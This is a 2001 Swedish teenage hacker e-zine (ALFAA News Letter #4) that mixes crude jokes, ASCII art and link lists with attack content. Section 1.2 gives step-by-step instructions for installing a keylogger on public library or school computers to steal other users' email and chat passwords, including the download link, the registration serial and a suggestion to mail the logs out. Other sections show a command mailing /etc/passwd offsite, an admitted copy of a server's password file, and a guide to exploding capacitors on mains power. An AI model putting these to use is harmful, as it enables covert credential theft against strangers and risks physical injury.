bexy@lovemail.com
93riclof@skolor.hagfors.se
carder@polisen.nu
amel_21@hotmail.com
zipryz@polisen.nu 
_______________________________________________________
 __________________          ____________________
(18:25 2001-08-14  )        (ALFAA NEWS LETTER #4)
(21:44 2001-08-25  )        (=WWW.ALFAAWEB.COM===)
 ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯          ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


                 :::        ::::   :::      ::: 
              :+: :+:     :+:+:   :+:      :+: 
            +:+   +:+    :+:+:+  +:+      +:+ 
::::::::  +#++:++#++: + +#+ +:+ +#+  +#  +#+ :::::::::::::::
+:+:+:+: +#+ +:+ +#+ : +#+  +#+#+#  +:  +#+ +:+:+:+:+:+::::
:+:+:+  #+# :+  #+# . #+# : #+#+#  :+  #+# +:+:+:+:+:+:+::                 
:::::  ###     ### : ###    ####  ::  ########## ::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
                 
       --Craqqing is here to stay---
_______________________________________________________
      



     =============================
       Medlemmar i ALFAA: 4
       Prenumeranter av ANL: 5
       Prenumeranter av E-ANL: 1
       Teckensnitt: Fixedsys
       Email: zipryz@polisen.nu   
     ============================








  


                     
                       
                 Redaktör: ZipryZ Híll 
                 Korrektur: ZipryZ Híll 
      

 SEKTOR                INFO                 INSÄNDARE   KÄLLA/SKRIBENT
¯¯¯¯¯¯¯       ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯   ¯¯¯¯¯¯¯¯¯  ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
_____INTRO _____________________________________________________________
[0.1]......eLdare...........................[ZIPRYZ]  {  ZipryZ        }
[0.2]......GizzlerZone......................[GIZZLER] { Gizzler        }
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
_____IT________________________________________________________________
[1.1]......Sendmail Teknik 1.Gammal.........[ZIPRYZ] {     020         }
[1.2]......SPRÄNG INTEGRITETEN!!!...(LAMT)..[Z1PRYZ] {  Z1pryz EVIL    }
[1.3]......Skjut kretsar med glock..........[Z1PRYZ] {  Z1pryz EVIL    }
[1.4]......HTTPDemonens hemliga skyffe?.....[ZIPRYZ] {    ZipryZ       } 
[1.5]......Månadens hatobjeqt: Hackers......[ZIPRYZ] {    ZipryZ       } 
[1.6]......Projeqt:10b......................[ALFAA ] { ALFAA PROJEQT   }
[1.7]......Feedback:2000 ingen ny säkerhet..[ZIPRYZ] { Zipryz Híll     }
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
_______FA_______________________________________________________________
[2.1]......ASCII ART........................[]..........................
[2.2]......CITAT/NOTISAR....................[]..........................
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
_____LÄNKAR_____________________________________________________________
[3.1]......WWW..............................[ZIPRYZ] 
[3.2]......FTP..............................[ZIPRYZ]
[3.3]......USENET...........................[ZIPRYZ]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
_____OUTRO______________________________________________________________
[3.1]......eLdare...........................[ZIPRYZ] {    ZipryZ Híll  }
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


START:

####################### INTRO  ###########################################
=======================        ===========================================
[0.1]......eLdare...........................[ZIPRYZ]  {  ZipryZ        }
     
     Ledarsidan tas över av kriminella skräp svin.
     ! Riktiga pyromaner därav titeln: eLdare (kolla versalen) !
     Nu till verkligheten då..
     
     Förbättringar denna gång:
     - Har mer tid att jobba med skiten.
     - Mer länkar
     - Mer 3l33t inriktad
     - Mer inspirerad av "020 knulla döden"

     Dåligare:
     - Mer fördomar..
     - Mer svärord.
     - Mer inspirerad av "020 knulla döden"
     - ANL existerar än.
     - Fått lov att göra slut med min flickvän

      -TeknoVarning-
      Varning!
      Akta er för att programmera på sdf.lonestar.org
      för dom är verkligen rädda för programmerare.
      Skulle testa om det gick att kompilera på den
      och det gick, men sen stannade skalet upp och jag startade
      om och såg ett meddelande:
 
      ############################################################
      #  YOUR ACCOUNT HAS NOW BEEN CLOSED FOR MALICOUS USE OF    #
      #  OUR SERVER. ALL YOUR ACTIVITES HAS BEEN LOGGED AND      #
      #  WE ARE NOW CHECKING IT AND DECIDING YOUR FATE!!!        #
      ############################################################
 
      Åh just det. Jag gjorde visst så här också:

      csh$>cp /etc/passwd /usr/user/zipryz/passwdsdf
  
      Kanske var det därför.. 
      Men det var shadow ändå så det sket sig..
 
    Förresten. Fattar ni att jag nu byter 'Cracking' till:
    Craqqing så att alla fattar vad jag menar så dom inte tror
    att jag menar Cracka sig in i ett program..
    [CRAQQING = Att bryta sig in i en annans system
                Eller ren elektronisk-jävelskap     ]

    Tänkte också göra en på engelska för den utländska
    publiken för craqqing är "lite" internationellt   
    och då tycker jag att det bästa vore att
    göra en engelsk en, eller hur? Den börjar inte förrän
    nästa nummer så.. Läs mer då, Okej?

    En skräp sak till: Dom använder M$ WinBabar
    på Spice girl's ljuddatorer!!!
    
    Skulle kanske också välkomna lilla gizzler 
    som nu kommer smygnas upp från verklighetens
    bruna, dyngiga kloaker i stan. Upp ur locket
    och in i våran skrivarstudio. Tackar och
    välkommen. En äkta craqqer.

    Jap jap -Zipryz-




====================W-3-1-C-0-M-3--G-I-Z-Z-L-E-R=!=======================
[0.2]......GizzlerZone......................[GIZZLER] { Gizzler        }

     Gizzler har nu ordet:
 :
 -Jaha då var det dags för lilla kalle igen då, sa Läraren.
 -Mmm.. , svarar Kalles pappa. 
 -Aha, svarar Kalle som fått syn på en vattenkaraff fylld med härligt friskt rinnade vatten 
  som är så klart att man nj.. nu blev jag blöt också fan fan..

 Fortsättning: och börjar gnida sig obarmhärtigt. Kalle har förresten lite filmjölk i håret,
 man undrar sa flundran som fick utlösning på herrtoan.
 -Ja det är väl bäst att jag sätter igång och skriver på riktigt inget mer flams.
 Okej...
 -Ja det är väl lika bra jag sätter igång då, sa läraren
 -Ja sa : Kalles pappa
 Berättaren -labla MVG blablaha blatur censur ackulunaturG+Vg Vg+och så fortsatte det
 -Jo också ville jag prata med dig om en ny inlärnings teknik för barn som jag läste 
  i lärar journalen den kallas PC HEMMA och riktar sig mot barn med inlärnings problem...
 -Men vad jag hörde så går det ganska bra för honom, svarade pappan.
 -Men den verkar så bra.
 -Kalle kom vi går, säger pappan.
 -Snälla gå inte säger läraren.
 -Jo kom kalle.
 Jag vill prova den snällla.. uäwwwh uuäwwh och så kastade sig fröken på golvet. 

 Kalle kom aldrig tillbaka till den fröken.
 . 

 :
 Ur Komvux: Jag var ute och gick i Lesjöfors en liten sketen stad i Värmland
 jo det stog några komvuxare där och prata om vad dom gick på för kurser 
 då en av dom sa:
 -Jag går på data jag.
 Och då sa dom andra åhh fan fan vad du måste va smart. 
 Jovars så muppen också skulle han visa vad han kunde, jag förväntade mig 3d studio max 
 eller Visual Basic allt annat än programmet dataskolan med pekfunktioen och 
 jakten på datormusen. Livet kan bedra en del är lika säkert som att dom andra 
 blir systemutvecklare
 '

 :
 Sång: Felfria Värmland       Melodi Värmlands visan
 ack värmeland du kan suuga av mitt arsle en gång eller två 
 ty du saknar alla indikationer på mänskligt interlääckt.
 '
 :
 Något att tänka på:
 Varför står det i tidningar "dam-dara-dam" när ingen vettig människa säger så.?
 '
 :
 (ty då namnet kan väcka mardrömmar om pchemma så har namnen bytts ut till:
  Spanolito och Dorima)

 När jag skrev artikeln PC HEMMA så tittade jag över skärmen och såg min kompis 
 Spanolito sitta och läsa en, inte så konstigt förresten efter min käre 
 Spanolito varit en trogen prenumeruant av PC HEMMA.
 I alla fall så såg jag  någonting konstigt i hans blick, den liksom var HELGALEN. 
 Jag började bli orolig för han skrattade och läste ivrigt vidare i tidningen som nu 
 ska kallas bilderboken, ialla fall visste jag att jag var tvungen att fly.
 Telefonen stod i köket och jag visste att han var snabb, mycket snabb.
 Jag såg att han började tappa fattningen när han började pratade med sig själv. 
 Då tog jag chansen jag sprang allt vad jag kunde. men där stog Dorima hans syster 
 och pratade.
 Spanolito kom emot mig som en galning. Jag låste in mig på toa jag hörde 
 hur han banka och slet i dörren. Plötsligt tystnade bankningarna jag pustade ut,
 men så hörde jag tugganden och gnagningar. Den djäveln skulle äta up dörren 
 för att få tag i mig. Jag visste att dörren inte skulle gå sönder
 så jag satte igång och ljuga för mig själv och när jag var så pass duktig att 
 jag trodde mig själv ljög jag till mig en anti bilderbok-galen-Spanolito-pistol och 
 öppnade dörren jag skjöt honom rakt i bröstet och sprang iväg mot polisstationen. 
 
 Nu ska jag va elak och hoppa över allting som hände därefter och berätta slutet.
 Jag satt på polisstationen när jag hörde att dom tagit honom. Han hade satts i 
 en container som skulle föras till grönland. Dagen efter kom militären 
 i sina jeepar till mig och frågade hur han blivit så starkt och så galen. 
 Dom korsförhörde mig. Jag berättade om hans beteende och allt sånt om dom 
 alla bilderböckerna.
 En överste berättade att dom skulle skicka alla bilderböckerna som 
 förnödenheter till irak så om ni nån gång köper en bilderbock i 
 irak så spring fort som faaan... 

 Slut på välkomstbrev
 Det var allt från Sveriges ALFAA Gruppens medlem: Gizzler 
 Nästa vecka handlar det och gestapo och judar
 och om datorer.
 Skriven av gizzler på kanten (av gal3nskap)..  
 '

          < Kul. Mera >

####################### INFORMATIONS TEKNIK ##############################
=======================                      =============================

[1.1]......Sendmail Teknik 1.Gammal.........[Z1PRYZ] {      020        }
 
   Fattar ni 3l33+ kidz detta:

 TELNET>open 
 TELNET>to:
 TELNET>to: billgates@skabort.com
 020rulez>mail du@suger.msdos -s "codez" < /etc/passwd
 020rulez>Fatta det, nu skickar jag den As groova lösenordsFilén
         till dig så du kan knäcka skiten och stoppa Billan..
 020rulez>exit
 020rulez>WARNING YOURE INFECTED WITH WINDOWS95!!!!
 020rulez>DIE SUCKER! BLAM BLAM BLAM..BOOOOOM...

 Taget ur en skitbra e-zine bättre än din skit:
 020 knulla döden.


 Källa: 020

^¨"=================================================================="¨^
[1.2]......SPRÄNG INTEGRITETEN!!!..(LAMT).....[Z1PRYZ] {  Z1pryz EVIL    }           
 
           Har du någonsin tänkt på att köra igång nåt sorts
           jävla lame projekt som att istället för craqqing så
           kan man ju springa bort till servern, smälta den
           armerade dörren, sparka, pissa slå hårt på server-
           skithögarna?
           Okidoki här har ni två skitprojekt som MÅSTE ut
           ur huvudet på grund av platsbehov. (skiten
           tar upp för mycket av mina 9 terabyte..)           
 

        {{1>  "Craqqa" datorer med lama verktyg som verkligen
              svider att använda som t.ex. "sub-7" och andra skit
              trojaner som är bra gjorda men inte ska resten av 
              världen få använda dem för små löjliga bäbisprojekt
              som 5kr1p+ Kiddies älskar...
              Du "chattar" på ICQ. Du frågar nörden i andra sidan
              telefjantlinjen om han vill ha dina "spel" som i verkligheten
              är ett jävla trojan som fungerar som en server.
              Din klient har du också annars suger skiten hårt
              för det går inte då.. Tänk dig, skit samma du fattar..
 
        {{2>  Hee hee. Denna teknik är ialla fall roligare.
              Vet du nåt roligt Public-place såsom ett
              biblioteket med datorer och internet 
              som har användare som älskar sina "lunar" 
              och "hotmail" konton?
              Vill du ha lösenordet, läsa hemligheter.
              Ändra lösenordet? Skicka ett brev
              till Gill Bates om att jag har 40 
              konton "hackade" och fortsätter tills
              han ger upp sina lömska planer och börjar gratis
              och själv gå ut i USA och ge folk som behöver
              program och datorer det. Och pengar också..
              Fattiga personer snackar jag om.
     
             Okej så här gör du om du är win32bit nörd:
     
                -Ladda heM: www.geocities.com/website/logme.zip
         
             Aha ... yea.. Kom igen nu Cr4QQar vi genom port Nada..
             LOCAl CrAqqing d00d! Starta skiten Nåt av programmen som lyder
             liknande i konverterad binär till ascii:
                 ====   pcpctrl.exe  ======
             Världens kewlaste program Just nu för jag är sur.
              Men jaG fortsätter svära så länge jag vill för jag känner
             för det, inte för att jag hatar eller avskyr er..
             Fjams, nu fortsätter jag..

             Nu när du kört det poppar en api ruta upp. "OK"
             sen klickar du Bort Readme.txt som poppar upp på skärmen.
             Nu ser du ett program right? Ser du Register rutaN?
             Well du har säkert startat ditt ultimata place för Serialz
             men hittade du nada finns här:
         +->  DFAZG 
         |  Detta ovan är lösenordet
         |                   |
         +-------------------+
             Fattar ni det?
             Lyssnar ni på Skön musik som AC/DC eller Metallica eller
             nåt annat som Marilyn Manson gillar jag er! Stick till biblioteket
             eller skolan eller va fan ni vill med en diskett fylld med den
             zippade filen som fanns på.. Kolla längre upp jag skrev den nyss.
             
             Lägg in den där och kör pcpctrl.exe och gör samma sak där.
             Registrera alltså. 
                                   WARNING 1# Tryck inte på "tab" för på win95 så 
                                              hängde det hela datorn varje gång..
             Nu inne i programmet så trycker du uppe till höger: "Run pcprotect"
             Och trycker sedan på stora ""OK""  knappen..
             Nu ska loggningen vara i full gång.. Vill du testa logga in på
             nåt roligt som hotmail (vilket skämt..) och loggar in.
             Logga in. Loggar in. Fan va sakta du är?
             Okey.. Nu minskar du fönstret och öppnar programmet igen om du avslutat
             det. Om knappen "Run pcprotect" är igång tycker jag att du trycker på
             "Stop #protect" och kollar i filen "pcplog.txt" som är i samma mapp
             du startade programmet ifrån.. Där ser du något roligt om det funka.

             Ti hi hi.. Fattar du vad du kan göra? Nää inte riktigt..
             Fan häng med då:
 
             Starta programmet på Offrets dator. Gå därifrån med "Run pcprotect" och 
             TRYCK PÅ "EXIT PCCONTROL.." annars är det lite lite lite misstänktsamt.
             Anyway.. 
             Du läser en bok (OM HACKING FÖRSTÅS) och ser en snubbe gå dit.. 
             Vad brukar man göra där? Ungdomar kollar email och lunar..
             Detta gäller just nu (2001-08-04) men finns andra 
             snubbar som säljer aktier eller liknande (!!!) det skulle vara coolt.

             Sen genom att dom har konstant internetuppkoppling skulle det
             inte vara så svårt med ett VB program skicka Pcplog.txt till
             en email...
                       INDUSTRI SPIONAGE!!!!!!!!!
             Nu får du få egna ideer hoppas du hade kul och jag vill inte
             säga hejdå därför skriver jag varken komma eller punkt men tyvärr
             har min lilla tid här i detta zine denna gång tagit slut och  
             jag respekterar inte sådana saker förutom PCP skiten som 
             är askul, men sjaskigt.. Det var sjaskigt att det tog slut mellan
             mig och min tjej men inget att göra åt...       SAD 01

^¨"=================================================================="¨^
[1.3]......Skjut kretsar med glock..........[Z1PRYZ] {  Z1pryz EVIL    } 

           Fan vilken skit alltså, vilken jädra smäll:
           Här har jag med roligaste sätten att förstöra
           roliga elektrolyt kondensatorer som du själv
           säkert har gömt någonstans som du tror är trasiga..
           Nåja.. Kolla här.
       
                     EL-UTTAG (220 volt ac)
                        .-------------.
                        |   _______   |
                        |  /       \  |
                        |  | #  #  |  |
                        |  | #  #  |  |
                        |  \_\__\__/  |
                        |     \  \_______________X-------|¯¯¯¯¯'¯|
                        |      \__________________X------|_____._|
                        |             |
                        '             ' 
           ALltså modell 1:  Koppla i en kondensator av typen Elektrolyt
           för har inte haft tid eller pengar eller proppar för
           att testa detta med andra typer.
           Gissa vad som händer, för dom flesta tål inte +85° Celsius
           så räkna ut skiten. En propp tål vad är det? 10 - 16 ampere
           har jag ialla fall. Nåja 10 till vanlig så:
      
             10 * 220 = 2200 W

           Kul vad?
           Hur mycket är watt tror du egentligen en elkondensator tål
           när den är på 85 grader?
           DET SÄGER KABOOM.
           Och en sfär på ca: 3 dm's diameter blir explosionen. Akta fingrar och 
           annat skit som flyger. 
           Vi hade varken erfarenhet eller dokumentation när vi tog ett
           uttagsplugg ni vet vad det är? Sån som sitter i änden av en strömkabel
           och ser uppkäftig ut när 220 volt strömmar igenom den..

             (FöLJANDE SKA GÖRAS UTAN ATT KABELN ÄR I STRÖMUTTAGET) 
          Ta en sån och öppna kabeln.. Där finns troligtvist två metal-wires.
          Där tejpar ni eller nåt annat, fast djäveln ni vill spränga till
          kina. (löda går också men tar tid;slöseri med lödtenn.)
          (Klart)

          Tryck nu in den någonstans och se den roliga explosionen.
         
          Fler sätt: 

        1>  Lägg den i mikrovågsougn, men vet inte vad som händer.
        2>  Ta två tänger med plast handtag och ta rent och Osäkert
            och tryck i den i eluttaget, men akta era inputsignalenheter bara!
        3>  Har ni en lödkolv eller lödpenna. lägg den i så fall på den och vänta ett tag
            sen om den (kondensatorn) är liten nog smäller den! Det gjorde vi första gången..
            (alltså Zipryz och Nestor)
        4>  GASOLBRÄNNARE!!!!
        5>  Pamela Andersson är väl het nog för att pulverisera den?
 
         ---EOS= (end of shit) ====---



^¨"=================================================================="¨^
[1.4]......HTTPDemonens hemliga skyffe?......[ZIPRYZ] {    ZipryZ       } 

    Lite info om HTTPD (http demonen).
    Taget ur The WWW security FAQ:

  AuthUserFile      /usr/local/etc/httpd/conf/passwd

    Kan lösenorden hittas här? Hmmm...
    Faan att man inte har Internet! "Sno ett dialup" hörs
    en röst i korridoren. 


  +-----------+

  "If you don't understand the language the script's 
  written in, show it to someone who does."
  
     Men om man är 3l33+ så letar man väl upp 
     lite information och lär sig det! Eller hur?
     Det där gäller nog för dom som inte har tid..
  
Källa: WWW Sec. faq

^¨"=================================================================="¨^
[1.5]......Månadens hatobjeqt: Hackers......[ZIPRYZ] {    ZipryZ       }  

      Nån som sett filmen "hackers" Jag
      tycker inte den är särskilt bra.
      Överallt i filmen nämns ordet "hacker" hela
      tiden och associeras med craqqers, sajberterrorister,
      etc. Varför det? Idioter som gjorde filmen...
      Dom enda gångerna dom säger nåt vettigt är 
      /root/ någonting.. DÅ börjar man förstå att dom
      använder nån typ av unix.. 
      Regnbågsböcker plockas fram. Också en bra sak.
      Sen är den cool för personerna är enormt roliga
      och deras klädstil är skitkewl..
      Just det! Mentor är också med..
      
      Så sammanfattning: Hata hackers (filmen alltså)
      För den är dålig. T.om. Operation takedown är
      bättre.
      En sak till. Jag skriver ca 300 gånger snabbare än
      de i filmen.
      


^¨"================================================================="¨^
[1.6]......Projeqt:10b......................[ALFAA ] { ALFAA PROJEQT   }

     (WARNING om ni inte vet vad 10b är i decimal så lär er det!  
     läs ASM t.ex. då lär ni er. Finns snart på min hemsida och
     följer med i ANL#5.
     Om ingen annan har nått annat göra än att trycka på knappar
     och spela in samtal har jag nu officiellt öppnat ett nytt projeqt.
     Kallad "The 0-2-0 list" och innebär att scanna alla 020-XXXXXX nummer.
     Här är ett smakprov på några jag leta efter VMB:

__________________________________________________________________________  
:Nummer:::::|:::::INFO::::::::::::::::::::::|:::::::::LJUDFIL:::::::::::::
------------V-------------------------------|-----------------------------
02079 0000 : En svensk tjej som snackar.    |   (ska spela in den snart...)
02079 0001 : Ringer men ingen svarar        |
02079 0002 : Assistens kåren                |   skrivbord\scanna 020\assistenskåren.wav
02079 0003 : NONE                           |
02079 0004 : NONE                           |
02079 0005 : NONE                           |
02079 0006 : NONE                           |
02079 0007 : Vet inte, nån filur svara.     |   skrivbord\scanna 020\dankeryd.wav
02079 0008 : NONE                           |
02079 0009 : NONE                           |
02079 0010 : "Telia kundbesked är ändrat..."|   skrivbord\scanna 020\kundbesked.wav
02079 0011 : "International broker.."       |   skrivbord\scanna 020\interbroker.wav
02079 0012 : SST nåt engelsk bedrägeri      |   skrivbord\scanna 020\sst.wav               *
             som liknar en VMB              '
02079 0013 : Tysk eller nåt annat som       |   skrivbord\scanna 020\tysk.wav   
             försöker prata svenska         |
             man får lämna meddelande       '
02079 0014 : BUSY                           |  
02079 0015 : Samma som 0012 /sst/           |                                              *
02079 0016 : "Ingen förbindning eller ???"  |   skrivbord\scanna 020\tysk2.wav      
02079 0017 : COOl. Engelsk operatör!!       |   skrivbord\scanna 020\visa.wav      
             Visa platinum center           '  
02079 0018 : Lite lik 0012 men. annat namn  |   skrivbord\scanna 020\rdavida.wav           *
02079 0019 : BUSY                           |
02079 0020 : BUSY (efter ett taaaag)        |
02079 0021 : nycrdd  NIU (Not In Use)       |   skrivbord\scanna 020\nycrdd.wav            
02079 0022 : nycrdd  NIU (Not In Use)       |   skrivbord\scanna 020\nycrdd.wav      

 +----------------+
                             _      _
   Förvisso har man mer, men ¯endast¯ medlemmar av ALFAA får den kompletta listan.
   Mer info längst ner om hur man blir medlem.



^¨"==================================================================="¨^
[1.7]......Feedback:2000 ingen ny säkerhet..[ZIPRYZ] { Zipryz Híll     }

      Jag sa i förra numret att win2000 inte verkade ha någon nyare 
      säkerhet, men dom hade visst uppgraderat det genom att kryptera
      SAM databasen. För att ni ska få en clue om vad jag snaqqar om 
      får ni här läsa något jag hittade i NAPALM.
     
     " Windows 2000

  To combat the wide spread use of L0phtCrack, Microsoft released a tool
  called Syskey with the NT Service Pack 4 that allowed for Administrators
  to encrypt their SAM databases. However the use of this was entirely
  optional resulting in many systems not implementing this security
  mechanism. With Windows 2000 however, the use of Syskey to encrypt the
  SAM database has become mandatory. Additionally, the hashes of local
  users are the only things stored in the SAM while those of domain users
  have been moved to the Active Directory Service (ADS). The major change
  here is the move to using two separate security databases. The ADS hash
  storage mechanism functions much like its SAM equivalent and is also
  mandatorily encrypted. Tools like pwdump2 (version 2) however already
  exist that can read LM-hash and NT-native hash values in the Windows 2000
  ADS and dump them to a text file.
        " 

   <Källa: Napalm issue 7>







####################### FA (FAST AVDELNING)  #########################
=======================                      =========================

[2.1]......ASCII ART........................[ZIPRYZ] 


          ¤¤----------------------¤¤
         ¤#                        #¤  
        ###-----------------------####
        ## ;;;;;;;;;;;;;;;;;;;;;;   ##
        #     WELCOME TO NORAD       #
        #   Enter your 3ll3+ pass    #
        #  or else our Sysshitadmin  #
        #  will (try) to hunt you    #
        #  down like a fucking rabie #
        #  Dog looking for meat!!!!  #                       
        ##  PASSWORD:               ##
        ###------------------------###

      ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     /                                   \
    /        ________________ _           \  One button for 
   /________/NASA AIR SPACE__\_\___________\ CraQQing nasa again


----------------------------------------------------------

            .-/                                    ~=-._
         .-~ /   ____  ______ __  _    _     _   ____|  ~-._
        ~~/  -~||  __||_  __//  || |  | |   | | / __/| .\~~
         / . . ||  __| | |  / ' || |__| |__ | || (__ |   \
        / / ~| ||____| |_| /_/|_||____|____||_| \___\| |\ \
       / /   |-~                                     ~-| \ \
      / /__                                             __\ \
     /  .-~                                             ~-.  \
    /.-~                                                   ~-.\
   /~                                                         ~\



            === Gissa var jag hitta denna? ====
               == För det säger jag icke ====
                 === nej.. NEJ SÄGER JAG! =
                     ==================

 
^¨"==================================================================="¨^

[2.2]......Citat/notisar....................[ZIPRYZ] {FNA}
          
      "Folk tycker om våra idéer. Men de tycker inte om oss."
        (Lars F Tobison (m))

     "Om det sitter sex fåglar i ett träd och man skjuter en,
      hur många finns då kvar?", frågar fröken sina elever.
      Pelle svarar: Inga, fröken.
      "Hur kommer du fram till detta svar?", frågar fröken.
      "Jo, om man skjuter en fågel så blir de andra skrämda
      och flyger därifrån. Alltså finns det inga kvar."
      "Det rätta svaret, Pelle, är att det finns fem fåglar
      kvar ... men jag tycker om ditt sätt att tänka."

      Efter en tid kommer Pelle till fröken och frågar: Fröken,
      om tre kvinnor står och äter glass och den ena slickar på
      glassen, den andra suger på glassen och den tredje biter
      på glassen, vem av dessa är då gift?
      Fröken tänker sig noga för innan hon svarar: Det är väl
      kvinnan som suger på den?
      Då svarar Pelle: Det rätta svaret, fröken, är att den som
      har en ring på fingret är den gifta kvinnan, ... men jag
      tycker om ditt sätt att tänka.


      "Ett inscannat, gulnat fotografi av den första prototypen till Altair
       8800, världens första hemdator"  / 020
         

        (Källa: FNA och 020 Knulla Döden)



####################### LÄNKAR #########################################
=======================        =========================================

[3.1]........WWW............................[ZIPRYZ]


   -Fördom #1 i ALFAA legionen:
   http://www.apple.com/macosx/        
   -Macintosh alltså.... >:=(

            
   -Liten, pyttenutte mobil? Näää..
   http://radio.se-swed.net/ac3.jpg


   -Atari fanatiker kommer nog
   -Uppskatta denna:
   http://www.atari-history.com/  


   -Sett star wars? Lekt med lego?
   http://www.geocities.com/droideka13/QueenAmidala1.html *
   -Då ska ni nog tjolla in siten ovanför..
   -Den är väldigt snygg. 


   -Denna var nog med i #3 men de va inte noga.
   http://tg5.cjb.net/
   -Den är väldigt bra, och har många grooviga saker::::


   -Alla säger ju att "å,ä eller ö" inte finns med på DNS.
   -Kolla då här:
   http://www.åäö.nu/
   -Men det är ju en NU adress..


   -Kommer inte håg, men den är snygg. Alltså värd
   -att kolla på ialla fall:
   http://squat.net/ascii/


   -Min hemsida.. (fan så inte klar men skit samma...)
   www.alfaaweb.com

   
   -Behöver ni l0phtcrack? Nåja
   -här är en ny FINARE sida som
   -ser proffesionell alltså business aktig
   -men leta efter tools så hittar ni l0phtcrack..
   www.lopht.com 
 

   - Fan ä däta då?
   http://www.zon.se/nww/fejsframe.html


   -ARGHH!! Micro$omBIEz finns över A L L T !
   http://www.kling.nu/minut.jpg


   -Hur man blir en datornörd PÅ svenska.
   http://zool.virtualave.net/geekswe.html


   -Vill du köpa en qool bok? 020-knulla-döden finns här t.ex.
   http://www.rootgear.nu

   -Troligtvist billigaste tele:
   http://www.flashbacktele.com
   -Billigare än telia iall fall. Tror jag...


   -Allt o lite mer än du tror om c64. 
   http://www.lemon64.com/

   
   -För er som gillar 3dsmax och vill se nyheter om den
   -i mpeg format:
   http://www2.discreet.com/animation/features.html. 


   -Problem ned lilla daton.. Ring då med atdtISP:IPHOSTNAME:http://www.datadocktorn.nu
   http://www.datadocktorn.nu   

   
   -Som dejanews.com fast på svenska. Snabbare och behöver ingen registration!!
   http://www.flashback.se/konferenser/
 

   -Säkert legowars:
   http://user.tninet.se/~dgj906n/Animationer/
   

   -Lär dig Altavista knepen.. FINNS egentligen med i den här utgåvan
   -av ANL.
   http://doc.altavista.com/adv_search/ast_haw_wellindexed.shtml

 
   -Vill du se en rolig Flash? tror jag om hackers.com bli craqqad:
   http://angelfire.com/wa3/happytime321/bannanaface.swf


   -Deja vu länk igen. Om M$'s arme.
   http://www.flashback.se/arkiv/gifs/div/MS/bg.jpg


   -Retro, gamla qoola bilder:
   http://www.regnirps.com/SEF/oddities.htm

   -Kick azz bra Deva vu länk till att göra ASCII text. 
   -Flera fonter och det är VÄLdigt värt att pröva.
    http://www.schnoggo.com/figlet.html

 
   -Vad är detta för något?? Inget hemsk hoppas jag.
    http://nyheter.idg.se/display.pl?ID=000310-CS10


   -FNA rekommendera denna (?? varför egentligen)
    http://download.theforce.net/stardudes.html


   -Här kan du säkert få reda på fakta om mailing listor:       
     http://liszt.com/ 


   -Regnbågs böckerna som alla vill ha!
    http://www.angelfire.com/sc2/hapyslapper/texts.html *F
   -Finns väldigt bra information..


   -Nörd med webkameror överallt!!!
    http://www.nerdman.com/ 
   -Absolut porrfri! (hoppas ja)
      
    
   -Men här däremot... Finns det:  
     www.cndb.com         
   -Just det! Celebrity Nude (database?).


                http://www.sluta.nu/  
           -THE END- (slut på internet...)





^¨"==================================================================="¨^
[3.2].........FTP...........................[ZIPRYZ]

     ftp.fortunecity.com

    (men du måste skaffa en på deras
     hemsida först www.fortunecity.com
     Den är bra. 25 mb www space)


^¨"==================================================================="¨^
[3.3]......usenet...........................[ZIPRYZ]

       Fan ska jag ta bort denna och bara ta med den
       om någon hittar någon adress?
       Okej.
       Tack för svaret.
         



####################### OUTRO ############################################
=======================       ============================================
[4.1]......eLdare...........................[ZIPRYZ]



        ,--------------------------------------------------------------,
        | Svaret i #3 : var GÖRAN                                      |
        | Kunde ingen det? Nej.. Se vad publiken är insatt i politik   |
        |                                                              |
        | Frågan: Carding, vad är det?                                 |
        |                                                              |
        |                                                              |
        |  För att svara på frågan skriv:                              |
        |                                                              |
        |   Email adress + Användarnamn + svaret                       |
        |                                                              |
        |   I ett email till mig på zipryz@polisen.nu                  |
        |   Pris: MUSIK + PROGS                                        |
        |                                                              |
        |    ------------------------------------Detta finns oxå på ---|
        |                                    www.alfaaweb.com snart    |
        '--------------------------------------------------------------'        



        ,------------------------------------------------------------,
        |             Nästa nummer..                                 |
        |            Ska skUUURken ta över och skjuva in en server   |
        |            med en del av en stor loggfil jag hitta.......  |
        |            Och något som var värt att vänta på ...         |
        |                                        Hej då!             |
        '------------------------------------------------------------'        


 
================================.
-- EOF=0x00dead ==================
================================'


          .------------------------------------------------.
          | Har du något att skicka in? zipryz@polisen.nu  |
	  .-----------------------------------------.------'
	  |                                         |
	  ;                                         ;
	  :       VILL DU PRENUMERA PÅ ANL?         :
	  .       SKICKA DÅ ETT MAIL TILL           .
	 
	  '          zipryz@polisen.nu              '

	          OCH MED FÖLJANDE INFORMATION: 
          :                                         :
	  .        subject: SUBSCRIBE-ANL           .
          |-----------------------------------------|
	  '      Vill du vara med i ALFAA?          :
          :      Som sagt, du måste vara lite       .
